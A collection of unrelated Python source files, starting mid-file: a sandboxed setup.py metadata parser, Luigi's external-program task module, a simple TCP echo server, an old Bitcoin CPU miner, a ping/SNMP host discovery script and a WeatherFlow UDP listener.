],
cwd=setup_dir,
timeout=EGG_INFO_TIMEOUT,
)
try:
egg_info_dir = [
egg_info
for egg_info in os.listdir(setup_dir)
if egg_info.endswith(".egg-info")
][0]
metadata = pkg_resources.PathMetadata(
setup_dir, os.path.join(setup_dir, egg_info_dir)
)
pkg_dist = PkgResourcesDistInfo(
pkg_resources.Distribution(
setup_dir, project_name=name, metadata=metadata
)
)
return pkg_dist
except IndexError:
LOG.error(
"Failed to build .egg-info %s:\n%s", list(os.listdir(setup_dir)), output
)
except subprocess.CalledProcessError as ex:
LOG.warning(
'Failed to build egg-info for %s:\nThe command "%s" produced:\n%s',
name,
subprocess.list2cmdline(ex.cmd),
ex.output,
)
try:
return _build_wheel(name, os.path.dirname(extracted_setup_py))
finally:
shutil.rmtree(temp_tar)
def parse_req_with_marker(req_str, marker):
return utils.parse_requirement(
req_str + " and {}".format(marker)
if ";" in req_str
else req_str + "; {}".format(marker)
)
def setup(
results, *_args, **kwargs
): # pylint: disable=too-many-branches,too-many-locals
# pbr uses a dangerous pattern that only works when you build using setuptools
# d2to1 uses unknown config options in setup.cfg
setup_frameworks = ("pbr", "d2to1", "use_pyscaffold")
for framework in setup_frameworks:
if framework in kwargs:
raise ValueError("Must run egg-info if {} is used".format(framework))
if "setup_requires" in kwargs and (
"pbr" in kwargs["setup_requires"] or "setupmeta" in kwargs["setup_requires"]
):
raise ValueError("Must run egg-info if pbr/setupmeta is in setup_requires")
if os.path.exists("setup.cfg"):
_add_setup_cfg_kwargs(kwargs)
name = kwargs.get("name", None)
version = kwargs.get("version", None)
reqs = kwargs.get("install_requires", [])
extra_reqs = kwargs.get("extras_require", {})
if version is not None:
version = utils.parse_version(str(version))
if isinstance(reqs, str):
reqs = [reqs]
all_reqs = list(utils.parse_requirements(reqs))
for extra, extra_req_strs in extra_reqs.items():
extra = extra.strip()
if not extra:
continue
try:
if isinstance(extra_req_strs, six.string_types):
extra_req_strs = [extra_req_strs]
cur_reqs = utils.parse_requirements(extra_req_strs)
if extra.startswith(":"):
req_with_marker = [
parse_req_with_marker(str(cur_req), extra[1:])
for cur_req in cur_reqs
]
else:
req_with_marker = [
parse_req_with_marker(
str(cur_req), 'extra=="{}"'.format(extra.replace('"', '\\"'))
)
for cur_req in cur_reqs
]
all_reqs.extend(req_with_marker)
except pkg_resources.RequirementParseError as ex:
print(
"Failed to parse extra requirement ({}) "
"from the set:\n{}".format(str(ex), extra_reqs),
file=sys.stderr,
)
raise
if name is not None:
name = name.replace(" ", "-")
results.append(DistInfo(name, version, all_reqs))
# Some projects inspect the setup() result
class FakeResult(object):
def __getattr__(self, item):
return None
return FakeResult()
def _get_include():
return ""
class FakeNumpyModule(ModuleType):
"""A module simulating numpy"""
def __init__(self, name):
ModuleType.__init__( # pylint: disable=non-parent-init-called,no-member
self, name
)
self.__version__ = "2.16.0"
self.get_include = _get_include
class FakeModule(ModuleType):
"""A module simulating cython"""
def __init__(self, name):
ModuleType.__init__( # pylint: disable=non-parent-init-called,no-member
self, name
)
def __call__(self, *args, **kwargs):
return FakeModule("")
def __iter__(self):
return iter([])
def __getattr__(self, item):
if item == "__path__":
return []
if item == "setup":
return setuptools.setup
return FakeModule(item)
def _add_setup_cfg_kwargs(kwargs):
LOG.info("Parsing from setup.cfg")
parser = configparser.ConfigParser()
parser.read("setup.cfg")
install_requires = kwargs.get("install_requires", [])
if parser.has_option("options", "install_requires"):
install_requires.extend(parser.get("options", "install_requires").split("\n"))
kwargs["install_requires"] = install_requires
extras_require = kwargs.get("extras_require", {})
if parser.has_section("options.extras_require"):
for extra, req_str in parser.items("options.extras_require"):
extras_require[extra] = req_str.split("\n")
kwargs["extras_require"] = extras_require
if parser.has_option("metadata", "name"):
kwargs["name"] = parser.get("metadata", "name")
if parser.has_option("metadata", "version"):
kwargs["version"] = parser.get("metadata", "version")
def remove_encoding_lines(contents):
lines = contents.split("\n")
lines = [
line
for line in lines
if not (
line.startswith("#")
and ("-*- coding" in line or "-*- encoding" in line or "encoding:" in line)
)
]
return "\n".join(lines)
def import_contents(modname, filename, contents):
module = imp.new_module(modname)
if filename.endswith("__init__.py"):
setattr(module, "__path__", [os.path.dirname(filename)])
setattr(module, "__name__", modname)
setattr(module, "__file__", filename)
sys.modules[modname] = module
contents = remove_encoding_lines(contents)
exec(contents, module.__dict__) # pylint: disable=exec-used
return module
def _parse_setup_py(
name, setup_file, extractor
): # pylint: disable=too-many-locals,too-many-statements
# pylint: disable=bad-option-value,no-name-in-module,no-member,import-outside-toplevel,too-many-branches
# Capture warnings.warn, which is sometimes used in setup.py files
logging.captureWarnings(True)
results = []
setup_with_results = functools.partial(setup, results)
import os.path # pylint: disable=redefined-outer-name,reimported
# Make sure __file__ contains only os.sep separators
spy_globals = {
"__file__": os.path.join(extractor.fake_root, setup_file).replace("/", os.sep),
"__name__": "__main__",
"setup": setup_with_results,
}
# pylint: disable=unused-import,unused-variable
import codecs
import distutils.core
import fileinput
import multiprocessing
import requests
try:
import importlib.util
import urllib.request
except ImportError:
pass
if "numpy" not in sys.modules:
sys.modules["numpy"] = FakeNumpyModule("numpy")
sys.modules["numpy.distutils"] = FakeModule("distutils")
sys.modules["numpy.distutils.core"] = FakeModule("core")
sys.modules["numpy.distutils.misc_util"] = FakeModule("misc_util")
sys.modules["numpy.distutils.system_info"] = FakeModule("system_info")
def _fake_exists(path):
return extractor.exists(path)
def _fake_rename(name, new_name):
extractor.add_rename(name, new_name)
def _fake_execfile(path):
exec(extractor.contents(path), spy_globals, spy_globals)
def _fake_file_input(path, **_kwargs):
return open(path, "r")
old_cythonize = None
try:
import Cython.Build # type: ignore
old_cythonize = Cython.Build.cythonize
Cython.Build.cythonize = lambda *args, **kwargs: ""
except ImportError:
sys.modules["Cython"] = FakeModule("Cython")
sys.modules["Cython.Build"] = FakeModule("Build")
sys.modules["Cython.Distutils"] = FakeModule("Distutils")
sys.modules["Cython.Compiler"] = FakeModule("Compiler")
sys.modules["Cython.Compiler.Main"] = FakeModule("Main")
def os_error_call(*args, **kwargs):
raise OSError("Popen not permitted: {} {}".format(args, kwargs))
class FakePopen(object):
def __init__(self, *args, **kwargs):
os_error_call(*args, **kwargs)
def io_error_call(*args, **kwargs):
raise IOError("Network and I/O calls not permitted: {} {}".format(args, kwargs))
setup_dir = os.path.dirname(setup_file)
abs_setupdir = os.path.abspath(setup_dir)
class FakeSpec(object): # pylint: disable=too-many-instance-attributes
class Loader(object):
def exec_module(self, module):
pass
def __init__(self, modname, path):
self.loader = FakeSpec.Loader()
self.name = modname
self.path = path
self.submodule_search_locations = None
self.has_location = True
self.origin = path
self.cached = False
self.parent = None
self.contents = extractor.contents(path)
# pylint: disable=unused-argument
def fake_load_source(modname, filename, filehandle=None):
return import_contents(modname, filename, extractor.contents(filename))
def fake_spec_from_file_location(modname, path, submodule_search_locations=None):
return FakeSpec(modname, path)
def fake_module_from_spec(spec):
return import_contents(spec.name, spec.path, spec.contents)
spec_from_file_location_patch = begin_patch(
"importlib.util", "spec_from_file_location", fake_spec_from_file_location
)
module_from_spec_patch = begin_patch(
"importlib.util", "module_from_spec", fake_module_from_spec
)
load_source_patch = begin_patch(imp, "load_source", fake_load_source)
class ArchiveMetaHook(object):
def __init__(self):
self.mod_mapping = {}
def find_module(self, full_module, path=None):
path_name = full_module.replace(".", "/")
dirs_to_search = [abs_setupdir] + (path if path is not None else [])
for sys_path in sys.path:
if extractor.contains_path(sys_path):
dirs_to_search.append(sys_path)
for dir_to_search in dirs_to_search:
for archive_path in (
os.path.join(dir_to_search, path_name) + ".py",
os.path.join(dir_to_search, path_name, "__init__.py"),
):
if extractor.exists(archive_path):
self.mod_mapping[full_module] = archive_path
return self
return None
def load_module(self, fullname):
LOG.debug("Importing module %s from archive", fullname)
filename = self.mod_mapping[fullname]
code = extractor.contents(filename)
ispkg = filename.endswith("__init__.py")
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__file__ = filename
mod.__loader__ = self
if ispkg:
mod.__path__ = []
mod.__package__ = fullname
else:
mod.__package__ = fullname.rpartition(".")[0]
exec(code, mod.__dict__)
return mod
meta_hook = ArchiveMetaHook()
sys.meta_path.append(meta_hook)
fake_stdin = StringIO()
def _fake_find_packages(*args, **kwargs):
return []
# fmt: off
patches = patch(
sys, 'stderr', StringIO(),
sys, 'stdout', StringIO(),
sys, 'stdin', fake_stdin,
os, '_exit', sys.exit,
os, 'symlink', lambda *_: None,
'builtins', 'open', extractor.open,
'__builtin__', 'open', extractor.open,
'__builtin__', 'execfile', _fake_execfile,
subprocess, 'check_call', os_error_call,
subprocess, 'check_output', os_error_call,
subprocess, 'Popen', FakePopen,
multiprocessing, 'Pool', os_error_call,
multiprocessing, 'Process', os_error_call,
'urllib.request', 'urlretrieve', io_error_call,
requests, 'Session', io_error_call,
requests, 'get', io_error_call,
requests, 'post', io_error_call,
os, 'listdir', lambda path: [],
os.path, 'exists', _fake_exists,
os.path, 'isfile', _fake_exists,
os, 'rename', _fake_rename,
io, 'open', extractor.open,
codecs, 'open', extractor.open,
setuptools, 'setup', setup_with_results,
distutils.core, 'setup', setup_with_results,
fileinput, 'input', _fake_file_input,
setuptools, 'find_packages', _fake_find_packages,
sys, 'argv', ['setup.py', 'egg_info'])
# fmt: on
with patches:
try:
sys.path.insert(0, abs_setupdir)
if setup_dir:
os.chdir(abs_setupdir)
contents = extractor.contents(os.path.basename(setup_file))
if six.PY2:
contents = remove_encoding_lines(contents)
contents = contents.replace("print ", "").replace(
"print(", "(lambda *a, **kw: None)("
)
exec(contents, spy_globals, spy_globals)
except SystemExit:
LOG.warning("setup.py raised SystemExit")
finally:
if old_cythonize is not None:
Cython.Build.cythonize = old_cythonize
if abs_setupdir in sys.path:
sys.path.remove(abs_setupdir)
end_patch(load_source_patch)
end_patch(spec_from_file_location_patch)
end_patch(module_from_spec_patch)
sys.meta_path.remove(meta_hook)
for module_name in list(sys.modules.keys()):
try:
module = sys.modules[module_name]
except KeyError:
module = None
if module is None:
continue
if isinstance(module, (FakeModule, FakeNumpyModule)):
del sys.modules[module_name]
elif hasattr(module, "__file__") and module.__file__:
module_file = module.__file__
if hasattr(sys, "real_prefix"):
sys_prefix = sys.real_prefix
elif hasattr(sys, "base_prefix"):
sys_prefix = sys.base_prefix
else:
sys_prefix = sys.prefix
if (
not module_file.startswith(sys_prefix)
and not module_file.startswith(sys.prefix)
and extractor.contains_path(module.__file__)
):
del sys.modules[module_name]
if not results:
raise ValueError(
"Distutils/setuptools setup() was not ever "
'called on "{}". Is this a valid project?'.format(name)
)
result = results[0]
if result is None or (result.name is None and result.version is None):
raise ValueError(
"Failed to fetch any metadata from setup() call. Is this numpy?"
)
return result
|
external_program.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2016 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Template tasks for running external programs as luigi tasks.
This module is primarily intended for when you need to call a single external
program or shell script, and it's enough to specify program arguments and
environment variables.
If you need to run multiple commands, chain them together or pipe output
from one command to the next, you're probably better off using something like
`plumbum`_, and wrapping plumbum commands in normal luigi
:py:class:`~luigi.task.Task` s.
.. _plumbum: https://plumbum.readthedocs.io/
"""
import logging
import os
import re
import signal
import subprocess
import sys
import tempfile
from contextlib import contextmanager
from multiprocessing import Process
from time import sleep
import luigi
from luigi.parameter import ParameterVisibility
logger = logging.getLogger('luigi-interface')
class ExternalProgramTask(luigi.Task):
"""
Template task for running an external program in a subprocess
The program is run using :py:class:`subprocess.Popen`, with ``args`` passed
as a list, generated by :py:meth:`program_args` (where the first element should
be the executable). See :py:class:`subprocess.Popen` for details.
Your must override :py:meth:`program_args` to specify the arguments you want,
and you can optionally override :py:meth:`program_environment` if you want to
control the environment variables (see :py:class:`ExternalPythonProgramTask`
for an example).
By default, the output (stdout and stderr) of the run external program
is being captured and displayed after the execution has ended. This
behaviour can be overridden by passing ``--capture-output False``
"""
capture_output = luigi.BoolParameter(default=True, significant=False, positional=False)
stream_for_searching_tracking_url = luigi.parameter.ChoiceParameter(
var_type=str, choices=['none', 'stdout', 'stderr'], default='none',
significant=False, positional=False, visibility=ParameterVisibility.HIDDEN,
description="Stream for searching tracking URL")
"""
Used for defining which stream should be tracked for URL, may be set to 'stdout', 'stderr' or 'none'.
Default value is 'none', so URL tracking is not performed.
"""
tracking_url_pattern = luigi.OptionalParameter(
default=None, significant=False, positional=False, visibility=ParameterVisibility.HIDDEN,
description="Regex pattern used for searching URL in the logs of the external program")
"""
Regex pattern used for searching URL in the logs of the external program.
If a log line matches the regex, the first group in the matching is set as the tracking URL
for the job in the web UI. Example: 'Job UI is here: (https?://.*)'.
Default value is None, so URL tracking is not performed.
"""
def program_args(self):
"""
Override this method to map your task parameters to the program arguments
:return: list to pass as ``args`` to :py:class:`subprocess.Popen`
"""
raise NotImplementedError
def program_environment(self):
"""
Override this method to control environment variables for the program
:return: dict mapping environment variable names to values
"""
env = os.environ.copy()
return env
@property
def always_log_stderr(self):
"""
When True, stderr will be logged even if program execution succeeded
Override to False to log stderr only when program execution fails.
"""
return True
def _clean_output_file(self, file_object):
file_object.seek(0)
return ''.join(map(lambda s: s.decode('utf-8'), file_object.readlines()))
def build_tracking_url(self, logs_output):
"""
This method is intended for transforming pattern match in logs to an URL
:param logs_output: Found match of `self.tracking_url_pattern`
:return: a tracking URL for the task
"""
return logs_output
def run(self):
args = list(map(str, self.program_args()))
logger.info('Running command: %s', ' '.join(args))
env = self.program_environment()
kwargs = {'env': env}
tmp_stdout, tmp_stderr = None, None
if self.capture_output:
tmp_stdout, tmp_stderr = tempfile.TemporaryFile(), tempfile.TemporaryFile()
kwargs.update({'stdout': tmp_stdout, 'stderr': tmp_stderr})
try:
if self.stream_for_searching_tracking_url != 'none' and self.tracking_url_pattern is not None:
with self._proc_with_tracking_url_context(proc_args=args, proc_kwargs=kwargs) as proc:
proc.wait()
else:
proc = subprocess.Popen(args, **kwargs)
with ExternalProgramRunContext(proc):
proc.wait()
success = proc.returncode == 0
if self.capture_output:
stdout = self._clean_output_file(tmp_stdout)
stderr = self._clean_output_file(tmp_stderr)
if stdout:
logger.info('Program stdout:\n{}'.format(stdout))
if stderr:
if self.always_log_stderr or not success:
logger.info('Program stderr:\n{}'.format(stderr))
else:
stdout, stderr = None, None
if not success:
raise ExternalProgramRunError(
'Program failed with return code={}:'.format(proc.returncode),
args, env=env, stdout=stdout, stderr=stderr)
finally:
if self.capture_output:
tmp_stderr.close()
tmp_stdout.close()
@contextmanager
def _proc_with_tracking_url_context(self, proc_args, proc_kwargs):
time_to_sleep = 0.5
file_to_write = proc_kwargs.get(self.stream_for_searching_tracking_url)
proc_kwargs.update({self.stream_for_searching_tracking_url: subprocess.PIPE})
main_proc = subprocess.Popen(proc_args, **proc_kwargs)
pipe_to_read = main_proc.stderr if self.stream_for_searching_tracking_url == 'stderr' else main_proc.stdout
def _track_url_by_pattern():
"""
Scans the pipe looking for a passed pattern, if the pattern is found, `set_tracking_url` callback is sent.
If tmp_stdout is passed, also appends lines to this file.
"""
pattern = re.compile(self.tracking_url_pattern)
for new_line in iter(pipe_to_read.readline, ''):
if new_line:
if file_to_write:
file_to_write.write(new_line)
match = re.search(pattern, new_line.decode('utf-8'))
if match:
self.set_tracking_url(
self.build_tracking_url(match.group(1))
)
else:
file_to_write.flush()
sleep(time_to_sleep)
track_proc = Process(target=_track_url_by_pattern)
try:
track_proc.start()
with ExternalProgramRunContext(main_proc):
yield main_proc
finally:
# need to wait a bit to let the subprocess read the last lines
track_proc.join(time_to_sleep * 2)
if track_proc.is_alive():
track_proc.terminate()
pipe_to_read.close()
class ExternalProgramRunContext:
def __init__(self, proc):
self.proc = proc
def __enter__(self):
self.__old_signal = signal.getsignal(signal.SIGTERM)
signal.signal(signal.SIGTERM, self.kill_job)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is KeyboardInterrupt:
self.kill_job()
signal.signal(signal.SIGTERM, self.__old_signal)
def kill_job(self, captured_signal=None, stack_frame=None):
self.proc.kill()
if captured_signal is not None:
# adding 128 gives the exit code corresponding to a signal
sys.exit(128 + captured_signal)
class ExternalProgramRunError(RuntimeError):
def __init__(self, message, args, env=None, stdout=None, stderr=None):
super(ExternalProgramRunError, self).__init__(message, args, env, stdout, stderr)
self.message = message
self.args = args
self.env = env
self.out = stdout
self.err = stderr
def __str__(self):
info = self.message
info += '\nCOMMAND: {}'.format(' '.join(self.args))
info += '\nSTDOUT: {}'.format(self.out or '[empty]')
info += '\nSTDERR: {}'.format(self.err or '[empty]')
env_string = None
if self.env:
env_string = ' '.join(['='.join([k, '\'{}\''.format(v)]) for k, v in self.env.items()])
info += '\nENVIRONMENT: {}'.format(env_string or '[empty]')
# reset terminal color in case the ENVIRONMENT changes colors
info += '\033[m'
return info
class ExternalPythonProgramTask(ExternalProgramTask):
"""
Template task for running an external Python program in a subprocess
Simple extension of :py:class:`ExternalProgramTask`, adding two
:py:class:`luigi.parameter.Parameter` s for setting a virtualenv and for
extending the ``PYTHONPATH``.
"""
virtualenv = luigi.Parameter(
default=None,
positional=False,
description='path to the virtualenv directory to use. It should point to '
'the directory containing the ``bin/activate`` file used for '
'enabling the virtualenv.')
extra_pythonpath = luigi.Parameter(
default=None,
positional=False,
description='extend the search path for modules by prepending this '
'value to the ``PYTHONPATH`` environment variable.')
def program_environment(self):
env = super(ExternalPythonProgramTask, self).program_environment()
if self.extra_pythonpath:
pythonpath = ':'.join([self.extra_pythonpath, env.get('PYTHONPATH', '')])
env.update({'PYTHONPATH': pythonpath})
if self.virtualenv:
# Make the same changes to the env that a normal venv/bin/activate script would
path = ':'.join(['{}/bin'.format(self.virtualenv), env.get('PATH', '')])
env.update({
'PATH': path,
'VIRTUAL_ENV': self.virtualenv
})
# remove PYTHONHOME env variable, if it exists
env.pop('PYTHONHOME', None)
return env
|
serwerTCP.py
|
#!/usr/bin/python
#coding=utf-8
print "Content-type:text/html\r\n\r\n"
print '<html>'
print '<head>'
print '<title>Socket kurcze !</title>'
print '</head>'
print '<body>'
print '<h2>Hello Word! This is my first CGI program</h2>'
print '</body>'
print '</html>'
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from os import curdir, sep
import os
import subprocess
import socket
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 8081
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print "[*] Nasłuchiwanie na porcie %s:%d" % (bind_ip,bind_port)
# wątek do obsługi klienta
def handle_client(client_socket):
# drukuje informacje przesłane przez klienta
request = client_socket.recv(1024)
print "[*] Odebrano: %s" % request
# wysyła pakiet z powrotem
client_socket.send("ACK!")
client_socket.close()
while True:
client,addr = server.accept()
print "[*] Przyjęto połączenie od: %s:%d" % (addr[0],addr[1])
# utworzenie wątku klienta do obsługi przychodzących danych
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 7776
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
discover.py
|
#!/usr/bin/env python
from processing import Process, Queue, Pool
import time
import subprocess
from IPy import IP
import sys
from snmp import Snmp
q = Queue()
oq = Queue()
#ips = IP("10.0.1.0/24")
ips = ["192.19.101.250", "192.19.101.251", "192.19.101.252","192.19.101.253",
"192.168.1.1"]
num_workers = 10
class HostRecord(object):
"""Record for Hosts"""
def __init__(self, ip=None, mac=None, snmp_response=None):
self.ip = ip
self.mac = mac
self.snmp_response = snmp_response
def __repr__(self):
return "[Host Record('%s','%s','%s')]" % (self.ip,
self.mac,
self.snmp_response)
def f(i,q,oq):
while True:
time.sleep(.1)
if q.empty():
sys.exit()
print "Process Number: %s Exit" % i
ip = q.get()
print "Process Number: %s" % i
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
print "%s: is alive" % ip
oq.put(ip)
else:
print "Process Number: %s didn't find a response for %s " % (i, ip)
pass
def snmp_query(i,out):
while True:
time.sleep(.1)
if out.empty():
sys.exit()
print "Process Number: %s" % i
ipaddr = out.get()
s = Snmp()
h = HostRecord()
h.ip = ipaddr
h.snmp_response = s.query()
print h
return h
try:
q.putmany(ips)
finally:
for i in range(num_workers):
p = Process(target=f, args=[i,q,oq])
p.start()
for i in range(num_workers):
pp = Process(target=snmp_query, args=[i,oq])
pp.start()
print "main process joins on queue"
p.join()
#while not oq.empty():
# print "Validated", oq.get()
print "Main Program finished"
|
udp.py
|
from socket import *
import threading, time, json
from .data import add_data_keys
# Define valid data types to document API and so calling application can be aware if needed
VALID_DATA_TYPES = ('evt_precip', 'evt_strike', 'rapid_wind', 'obs_air', 'obs_sky', 'obs_st', 'device_status',
'hub_status')
# Define UDP API parameters
_UDP_VERSION = 143
_UDP_PORT = 50222
class Udp:
_thread_name = 'weatherflow-udp-listener'
def __init__(self, bind_address='', debug=False):
"""
This class utilizes the local UDP broadcast data from the WeatherFlow hub which must exist on the same network
:param bind_address: IP address of interface to listen on (default is all)
:param debug: Enable debugging for low-level troubleshooting
"""
self.debug = debug
if debug:
print("Constructing UDP class")
self.sock = None
self.start(bind_address)
def start(self, bind_address='', udp_port=_UDP_PORT):
"""
Opens the network socket and starts the listening thread, called automatically during construction
:param bind_address: IP address of interface to listen on (default is all)
:param udp_port: UDP port to listen on
:return: Nothing
"""
# Make sure someone does not try to start the listener twice
if self.sock:
if self.debug:
print("Udp class has already been told to start listening")
else:
# Open socket
try:
if self.debug:
print("Opening UDP listener socket")
self.sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
self.sock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.setblocking(True)
self.sock.bind((bind_address, udp_port))
if self.debug:
print("UDP listener socket opened")
except:
raise UdpError("Issue listening on socket for UDP broadcast traffic")
# Latest data will be dict of object types containing dict with keys data, timestamp, fetched
self.latest_data = {}
# Start listening
self.run_thread = True
self.thread_exception = None
self.listen_thread = threading.Thread(target=self._listen, name=self._thread_name, daemon=True)
if self.debug:
print("Starting thread %s" % self._thread_name)
self.listen_thread.start()
def __del__(self):
"""
We try to call stop automatically, but the calling code should always do this for proper cleanup
:return:
"""
self.stop()
def stop(self):
"""
Triggers the listening thread to stop and closes the socket
:return:
"""
if self.debug:
print("Triggering %s thread to stop running" % self._thread_name)
self.run_thread = False
# Block until the listening thread has stopped running
while self.listen_thread.is_alive():
if self.debug:
print("Waiting for %s thread to shutdown" % self._thread_name)
time.sleep(.1)
# If socket not closed yet then close it
if self.sock:
if self.debug:
print("Closing listening socket")
self.sock.shutdown(SHUT_RDWR)
self.sock.close()
self.sock = None
def _listen(self):
"""
Method used for creating new thread to listen for incoming data on open socket
:return:
"""
if self.debug:
print("Listener thread %s started" % self._thread_name)
while self.run_thread:
if self.debug:
print("(%s) Listening for data..." % self._thread_name)
# Get data and send back to parent object so we can retrieve when we need
try:
data, host_info = self.sock.recvfrom(1024)
except:
self.thread_exception = UdpError("(%s) Issue receiving data from socket" % self._thread_name)
raise self.thread_exception
# Convert received data from bytes to string
raw_data = data.decode()
if self.debug:
print("(%s) Received: %s" % (self._thread_name, raw_data))
# Store data as structure for its object type
try:
data = json.loads(raw_data)
except:
raise UdpParseError('Issue parsing JSON received from WeatherFlow bridge UDP stream')
if data and 'type' in data:
data_type = data['type']
self.latest_data[data_type] = {'data': data, 'timestamp': time.time(), 'fetched': False}
self.latest_data['most_recent'] = data_type
else:
raise UdpParseError('UDP data received from WeatherFlow bridge has no field type')
if self.debug:
print("Listener thread stopped")
def new_data_available(self, data_type='most_recent'):
"""
Is new data available?
:param data_type: Which object type do we want to see if data is available for (or default to most recent data)
:return: True if yes, false if no
"""
# Has listener thread thrown an exception? If so we need to pass onto main program.
